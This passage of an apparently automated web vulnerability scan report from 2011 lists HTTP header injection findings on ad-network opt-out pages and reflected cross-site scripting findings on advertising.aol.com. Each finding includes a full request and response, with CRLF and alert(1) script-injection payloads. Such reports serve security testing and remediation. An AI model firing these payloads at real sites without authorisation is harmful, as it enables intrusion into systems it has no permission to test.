Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=d2dec
fcebb661513

Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=d
...[SNIP]...

1.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload b6d08%0d%0ad1e48e97822 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=b6d08%0d%0ad1e48e97822 HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:54:17 GMT
X-Name: dmc-s01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Fri, 11-Nov-2016 18:54:17 GMT; Path=/
Location: http://login.dotomi.com/ucm/b6d08
d1e48e97822

Content-Length: 0
Content-Type: text/plain


1.3. http://optout.crwdcntrl.net/optout [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 9f4a2%0d%0ae412256dee5 was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=9f4a2%0d%0ae412256dee5 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:54:06 GMT
Server: Apache/2.2.21 (EL)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 01-Dec-2079 22:08:13 GMT; Path=/
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=9f4a2
e412256dee5
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.4. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload e3500%0d%0a0d2f91ced44 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=e3500%0d%0a0d2f91ced44 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:55 GMT
Server: Apache/2.2.21 (EL)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 01-Dec-2079 22:08:02 GMT; Path=/
Location: http://optout.crwdcntrl.net/optout?d=e3500
0d2f91ced44
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f4343%0d%0a60ea6c9507b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&f4343%0d%0a60ea6c9507b=1 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:56 GMT
Server: Apache/2.2.21 (EL)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 01-Dec-2079 22:08:03 GMT; Path=/
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&f4343
60ea6c9507b
=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.6. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4c93a%0d%0aa3151d2e824 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/4c93a%0d%0aa3151d2e824 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/4c93a
a3151d2e824
/
Date: Sun, 13 Nov 2011 18:55:41 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/4c93a
a3151d2e824/">/servlet/4c93a
a3151d2e824/</a>

2. Cross-site scripting (reflected)  previous  next
There are 130 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1d2"><script>alert(1)</script>0b23579c30e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cd1d2"><script>alert(1)</script>0b23579c30e/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=e851862ebcbf727db49e0a259091cf10; expires=Tue, 06 Dec 2011 22:28:03 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/cd1d2"><script>alert(1)</script>0b23579c30e/0/4/1/" />
...[SNIP]...

2.2. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15dcf"-alert(1)-"de3b4132e8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15dcf"-alert(1)-"de3b4132e8d/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=22e736d8490193e479333449fcca4be7; expires=Tue, 06 Dec 2011 22:28:08 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/15dcf"-alert(1)-"de3b4132e8d/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.3. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9e50"-alert(1)-"9ae564d8d26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e9e50"-alert(1)-"9ae564d8d26/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=83e54e4c8c6d1a1b492d9d4a6461cbda; expires=Tue, 06 Dec 2011 22:28:11 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e9e50"-alert(1)-"9ae564d8d26/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.4. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6e17"><script>alert(1)</script>75e6ecfc371 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f6e17"><script>alert(1)</script>75e6ecfc371/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8dbdaadd097a8bdfcd586c1aa8302ed5; expires=Tue, 06 Dec 2011 22:28:05 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f6e17"><script>alert(1)</script>75e6ecfc371/1/4/1/" />
...[SNIP]...

2.5. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab8a"><script>alert(1)</script>221d6dbd84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2ab8a"><script>alert(1)</script>221d6dbd84/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=c71fbeec7ecea03d68b05361bd6f4a83; expires=Tue, 06 Dec 2011 22:28:08 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/2ab8a"><script>alert(1)</script>221d6dbd84/2/4/1/" />
...[SNIP]...

2.6. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 910f8"-alert(1)-"741ae746048 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /910f8"-alert(1)-"741ae746048/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=08ac62270117e55f06459c09f4bf7bc2; expires=Tue, 06 Dec 2011 22:28:15 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/910f8"-alert(1)-"741ae746048/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.7. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bf96"-alert(1)-"e525b34d932 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3bf96"-alert(1)-"e525b34d932/3/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=d4f80a5871de9e3e4c5d7d3a8cc5bd5c; expires=Tue, 06 Dec 2011 22:28:31 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3bf96"-alert(1)-"e525b34d932/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.8. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309cf"><script>alert(1)</script>ce1261c57ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /309cf"><script>alert(1)</script>ce1261c57ba/3/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
